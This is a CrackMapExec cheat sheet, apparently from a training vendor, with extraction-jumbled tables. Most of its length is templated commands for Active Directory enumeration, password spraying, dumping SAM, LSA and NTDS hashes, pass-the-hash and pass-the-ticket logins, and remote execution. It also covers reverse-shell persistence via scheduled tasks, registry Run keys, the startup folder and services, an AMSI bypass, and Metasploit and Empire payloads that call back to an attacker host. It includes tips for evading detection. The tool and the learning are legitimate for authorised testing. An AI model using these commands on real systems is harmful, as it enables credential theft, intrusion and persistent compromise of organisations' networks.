What Is CrackMapExec

CrackMapExec (CME) is an open-source hacking tool that automates gathering information,

executing advanced password attacks, and performing post-exploitation activities like lateral
movement.
It’s designed to be a “Swiss Army knife” for targeting Windows Active Directory environments
and has been used in many real-world attacks.

Some key features of CrackMapExec include:

● Active Directory Enumeration: It can enumerate Active Directory domains, forests,

users, groups, computers, and trust relationships to gather information about the
target environment.
● Credential Brute Forcing: The tool can attack various network services (e.g., SMB,
RPC, LDAP, and WinRM) with password spraying, credential stuffing, and brute force
attacks.
● Remote Code Execution: Using CrackMapExec, you can execute commands and
scripts remotely on target systems using PowerShell, WMI, SMB, and PSExec.
● Lateral Movement: CME can perform lateral movement and jump between
compromised machines on the internal corporate network using techniques like
pass-the-hash, pass-the-ticket, and token impersonation.
● Strong Integration Support: The tool's API and scripting support make it easy to
integrate with other penetration testing tools, such as Metasploit, PowerShell Empire,
and BloodHound.

CrackMapExec is an incredibly powerful tool to add to your arsenal. Its ability to conduct
post-exploitation activities against Active Directory environments is unmatched by any other
open-source tool.
Penetration testers or red teamers can harness this ability to perform thorough assessments
of an organization's security posture, identify vulnerabilities, and recommend improvements
that bolster its cyber defense.

Now that you know why you should learn CrackMapExec, let’s get our hands dirty and see
how to use it.

Installing CrackMapExec
CrackMapExec is installed by default on Kali Linux. However, there are several installation
options if you don’t want to use Kali.

Installing CrackMapExcec with package manager

You can install CrackMapExec with the apt package manager from the Kalix Linux
repositories with the following command: apt install crackmapexec

If you don’t have the Kali Linux repositories installed on your machine, read how to add the
Kali Linux official repositories to the sources list.

Installing CrackMapExcec with Docker

You can install CrackMapExec using Docker with the command: docker pull
byt3bl33d3r/crackmapexec

Check out the installation documentation on the official website to learn how to install Docker
on your machine.

Installing CrackMapExcec as a Python package

To install CrackMapExec as a Python package using the pip package installer, run the
following commands:
python3 -m pip install pipx
pipx ensurepath
pipx install crackmapexec

Here, Pipx is used to isolate all its dependencies and eliminate common installation
problems. You can also use other Python virtual environments, like venv.

Installing CrackMapExcec From GitHub

Finally, you can install CrackMapExec from source using the following commands:
apt-get install -y libssl-dev libffi-dev python-dev
build-essential
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
poetry install
poetry run crackmapexec
Once you have CrackMapExec installed, you can explore its rich feature set.
General CrackMapExec Syntax and Options
All CrackMapExec commands follow this syntax: crackmapexec [runtime options]
<service> [options] [-M module] [-o module options] <target>.
Command Line Description
Component
[runtime options] These are runtime options
that affect the performance
of the command.
<service> CrackMapExec can interact
with various services
running on the target
machine. Each can be used
to perform specific tasks
related to enumeration,
exploitation, or lateral
movement.
[options] Options are specific to the
service you are targeting,
but there are common ones
you will see.
[-M module] Each service
CrackMapExec supports
Examples
-h to display the help menu
-t THREADS to set the
number of concurrent
threads
--timeout TIMEOUT sets
a max timeout in seconds
for each thread
--jitter INTERVAL to
set a random delay between
each connection
winrm
ldap
ssh
rdp
mssql
ftp
smb
-u for username
-p for password
-h to get help for that
module
-x COMMAND to execute a
command on the target
-X PS_COMMAND to
execute a PowerShell
command
-L list modules available for
service
-M powerview wrapper
for PowerView’s functions
 has various modules that
you can use to exploit
vulnerabilities, target
credentials, or gather
information.
[-o module options] These are options specific
to the module you choose to
run.
<target>. The target is the IP address,
network range, or hostname
of the machine(s) you’re
attacking.
-M shellinject injects
raw shellcode into memory
-M zerologon exploits
ZeroLogon vulnerability
test_connection pings a host
-o
LHOST=<local-host>
specify the local host for a
Metasploit command
-o
LISTENER=<listener>
specify a listener for a
PowerShell Empire launcher
192.168.1.100
10.0.39.0/24
webserver1
Discovery and Enumeration With CrackMapExec
CrackMapExec’s smb option is great for gathering information about a target. It can identify
live hosts and collect data on domain users, groups, network shares, computers, and active
sessions.
It can even let you execute your own Windows Management Instrumentation (WMI) queries
to gather information about Active Directory objects, such as organizational units (OUs),
policies, and service accounts, while blending in with legitimate network traffic.

Command Description

Crackmapexec <service> Scan <target> for a specific service (e.g.

<target> winrm, ldap, ssh, rdp, mssql,
ftp, smb.). This can be used to identify
live hosts and open ports.

crackmapexec smb -u <USERNAME> Enumerates domain users. If a user is

-p <PASSWORD> --users <target> specified, more information is returned
(e.g., access, password policy, etc.)

crackmapexec smb -u <USERNAME> Enumerates domain groups. If a group is

-p <PASSWORD> --groups <target> specified, more information is returned.

crackmapexec smb -u <USERNAME> Enumerates shares and access.

-p <PASSWORD> --shares <target>

crackmapexec smb -u <USERNAME> Enumerates computer users (workstations

-p <PASSWORD> --computers and servers).
<target>

crackmapexec smb -u <USERNAME> Enumerates active sessions (users

-p <PASSWORD> --sessions currently accessing a share and you could
<target> target).

crackmapexec smb -u <USERNAME> Executes a specified WMI query to

-p <PASSWORD> --wmi <QUERY> enumerate specific information about
<target> domain objects.
Credential Harvesting and Brute Forcing With CrackMapExec
CrackMapExec is infamous for its password attacks and credential dumping capabilities. The
tool can run remote commands on systems to identify high-value accounts (e.g.,
Administrators) and run password spraying or brute attacks against those accounts.

Once it successfully logs in with a high-value account, it can use its credential dumping
features to extract NTLM hashes, cleartext passwords, and Kerberos tickets.

Command Description

crackmapexec <smb|winrm> -u Identifies the local Administrator account

<USERNAME> -p <PASSWORD> -x across machines.
‘net localgroup administrators’
<target>

crackmapexec <smb|winrm> -u Identifies the local Administrator account

<USERNAME> -p <PASSWORD> -X across machines using PowerShell.
‘Get-LocalGroupMember -Group
"Administrators"’ <target>

crackmapexec ldap -u <USERNAME> Identifies the local Administrator account

-p <PASSWORD> -M whoami across machines using whoami command.
<target>

crackmapexec <service> -u Performs a password spray attack against

<USERNAME> -p <PASSWORD> <target>. The <USERNAME> option can
<target> be a single user, a list of usernames
(comma separated), or a file containing
usernames. The same goes for the
<PASSWORD> option with passwords. Use
the runtime options above to tune your
attack and avoid getting locked out or
detected.

crackmapexec <service> -u If the service is not running on its standard

<USERNAME> -p <PASSWORD> --port port, use the --port option to specify the
<PORT> <target> custom port.

crackmapexec <service> -u To try username and password

<USERNAME> -p <PASSWORD>
--no-bruteforce <target>
combinations (e.g., user1:password1,
user2:password2), rather than password
spraying with a list of usernames and/or
passwords, use the --no-bruteforce
option.

crackmapexec <service> -u To continue guessing login credentials,

<USERNAME> -p <PASSWORD> even after being successful once, use the
--continue-on-success <target> --contine-on-success option.
 crackmapexec <smb|winrm> -u Dump SAM hashes from the target system
<USERNAME> -p <PASSWORD> --sam after a successful login. You can use smb
<target> or winrm services.

crackmapexec <smb|winrm> -u Dump LSA secrets from the target system

<USERNAME> -p <PASSWORD> --lsa after a successful login. You can use smb
<target> or winrm services.

crackmapexec smb -u <USERNAME> Dump the NTDS.dit file from the target
-p <PASSWORD> --ntds Domain Controller after a successful login.
[vss,drsupai ] <target> You can use either vss or drsuapi as
the method (drsuapi is the default).

Gaining Access and Lateral Movement With CrackMapExec

CrackMapExec can target services like SMB, WinRM, and LDAP to gain access to target
machines. It can use usernames, passwords, hashes, and Kerberos tickets to authenticate
to these services using pass-the-hash and pass-the-ticket attacks.

Once you’ve gained access to a machine, CrackMapExec is a great tool for performing
lateral movement. It can execute custom commands against multiple machines and blend
into legitimate traffic using commonly used protocols.

crackmapexec <smb|winrm> -u Dumps SAM hashes from the target system

<USERNAME> -p <PASSWORD> --sam after a successful login. You can use smb
<target> or winrm services.
 crackmapexec ldap -u <USERNAME> Gets AS REP response ready to crack with
-p <PASSWORD> --asreproast Hashcat to perform ASREP-roasting.
<target>

crackmapexec ldap -u <USERNAME> Gets the TGS ticket ready to crack with
-p <PASSWORD> --kerberoasting Hashcat to perform Kerberoasting.
<target>

crackmapexec <service> -H For services that use NTLM (e.g., winrm,

<HASH> <target> rdp, smb, ldap, mssql), you can log in
using NTLM hashes. Use the -H option
followed by a single hash, a list of hashes
(comma-separated), or a file containing
hashes. This is known as a pass-the-hash
attack.

crackmapexec <prococol> -k For services that use Kerberos (e.g.,

<KERBEROS_TICKET> <target> winrm, rdp, smb, ldap, mssql), you can
log in using a Kerberos ticket. Use the -k
option followed by a Kerberos ticket. This is
known as a pass-the-ticket attack.

crackmapexec <smb|winrm> -u Executes the specified command on the

<USERNAME> -p <PASSWORD> -x target machine after successful login.
<COMMAND> <target>

crackmapexec smb -u <USERNAME> Executes the specified command on the

-p <PASSWORD> --exec-method target machine after successful login using
<METHOD>. -x <COMMAND> <target> a specific method. This METHOD can be
mmcexec, atexec, smbexec, or
wmiexec.

crackmapexec <service> -u Lateral movement: login to a remote system

<USERNAME> -p <PASSWORD> using the stolen username or password.
<target>

Post-Exploitation With CrackMapExec

Post-exploitation is another area where CrackMapExec shines. The tool can establish
persistence on compromised hosts, collect detailed information about the network, systems,
and installed applications, and even move files between machines.
crackmapexec smb -u <USERNAME> Enables RDP on the target machine after a
-p <PASSWORD> -M rdp successful login. It’s useful to get an RDP
session on target.

crackmapexec smb -u <USERNAME> Logs in to the machine and lists tokens you
-p <PASSWORD> -M impersonate can impersonate on the machine to
escalate your privileges.

crackmapexec smb -u <USERNAME> Checks for files with the

-p <PASSWORD> -M AlwaysInstallElevated attribute that
install_elevated can be used to escalate your privileges.

crackmapexec smb -u <USERNAME> Gathers information on all anti-virus and

-p <PASSWORD> -M endpoint detection solutions installed on the
enum-avproducts machine.

crackmapexec smb -u <USERNAME> Puts a local file onto the target machine
-p <PASSWORD> --put-file LOCAL (e.g., --put-file backdoor.exe
REMOTE \\Windows\\Temp\\backdoor.exe).

crackmapexec smb -u <USERNAME> Gets a remote file from the target machine
-p <PASSWORD> --get-file REMOTE (e.g. --get-file
LOCAL \\Windows\\Temp\\creds.txt.
creds.txt).

crackmapexec smb -u <USERNAME> Logs in to the machine and use WMI to

-p <PASSWORD> -M enum_dns dump DNS from the AD DNS server.

crackmapexec smb -u <USERNAME> Uses WMI to get the target machine’s

-p <PASSWORD> -M current network connections.
get_netconnections

crackmapexec smb -u <USERNAME> Searches for KeePass-related files and

-p <PASSWORD> -M processes from which you could steal
keypass_discover credentials.

crackmapexec ldap -u <USERNAME> Retrieves information about the Active

-p <PASSWORD> -M get-network Directory network environments.

crackmapexec ldap -u <USERNAME> Retrieves Windows Local Administrator

-p <PASSWORD> -M laps Password Solution (LAPS) passwords.

crackmapexec mssql -u Automatically enumerates and exploits

<USERNAME> -p <PASSWORD> -M MSSQL privileges.
mssql_priv

crackmapexec <smb|winrm> -u Persistence: Creates a scheduled task on

<USERNAME> -p <PASSWORD> --x the target system that executes a reverse
‘schtasks /create /sc minute shell PAYLOAD at a specified interval or
 /mo 1 /tn "Reverse shell" /tr system event after uploading the PAYLOAD
<PAYLOAD>’ <target> to the machine first.

crackmapexec <smb|winrm> -u Persistence: Executes a registry PAYLOAD

<USERNAME> -p <PASSWORD> --x when the user logs in or the system starts
'reg add up after uploading the PAYLOAD to the
HKEY_LOCAL_MACHINE\SOFTWARE\Mic machine first.
rosoft\Windows\CurrentVersion\R
un /v <name> /t REG_SZ /d
"<PAYLOAD>"' <target>

crackmapexec smb -u <USERNAME> Persistence: Drops a PAYLOAD in the

-p <PASSWORD> --put-file Windows startup folder executed when the
<PAYLOAD> user logs in.
"%APPDATA%\Microsoft\Windows\St
art
Menu\Programs\Startup\<PAYLOAD>
"

crackmapexec <smb|winrm> -u Persistence: Installs a service on the target

<USERNAME> -p <PASSWORD> --x sc system that executes a PAYLOAD on
create <service_name> binPath= start-up after uploading the PAYLOAD to
"<PAYLOAD>" start= auto' the machine first.
<target>

CrackMapExec Advanced Techniques and Integrations

CrackMapExec has more advanced features. These include the ability to run PowerShell
commands and scripts and even obfuscate them. The tool also integrates with other hacking
frameworks like Metasploit and C2 frameworks (e.g., PowerShell Empire).

crackmapexec <smb|winrm> -u Executes a PowerShell command

<USERNAME> -p <PASSWORD> -X (PS_COMMAND) on the systems after
<PS_COMMAND> <target> successful login.
crackmapexec <smb|winrm> -u
<USERNAME> -p <PASSWORD> -X
<PS_COMMAND> --obfs <target>
crackmapexec smb -u <USERNAME>
-p <PASSWORD> -X PS_COMMAND
--amsi-bypass <FILE> <target>
crackmapexec smb -u <USERNAME>
-p <PASSWORD> -X <PS_COMMAND>
--clear-obfsscripts <target>
crackmapexec <mssql|smb> -u
<USERNAME> -p <PASSWORD> -M
empire_exec -o
LISTENER=<listener> <target>
crackmapexec <mssql|smb> -u
<USERNAME> -p <PASSWORD>
--local-auth -M met_inject -o
LHOST=<attack-machine>
LPORT=<listening-port>
Obfuscates PowerShell scripts/commands
ran.
Runs PowerShell scripts and commands
with a custom AMSI bypass file (FILE).
This is a PowerShell file that implements a
AMSI bypass method.
Clears all cached obfuscated PowerShell
scripts from memory.
Lateral movement: Logs in to a remote
system using a stolen username or
password and automatically generates and
executes a PowerShell Empire launcher
that calls back to the specified
<listener>. This gives you a PowerShell
Empire agent on the system
Logs in to a remote system using the stolen
username or password and automatically
generates and injects Metasploit shellcode
that calls back to a Metasploit handler using
LHOST and LPORT. This gives you a
Metasploit shell on the system.
Conclusion: CrackMapExec Cheat Sheet
This CrackMapExec cheat sheet includes everything you need to know to get started using
this powerful hacking tool, covering everything from enumeration to initial access and
post-exploitation.

It’s now time for you to get your hands dirty and use CrackMapExec yourself!

To learn more about CrackMapExec and ethical hacking, check out one of the courses
below. These are among the 1,000+ courses and labs in our StationX Accelerator Program.

It includes everything you need to jumpstart your cyber security career with professional
mentorship, a tailored career roadmap, and a vibrant community to support your journey.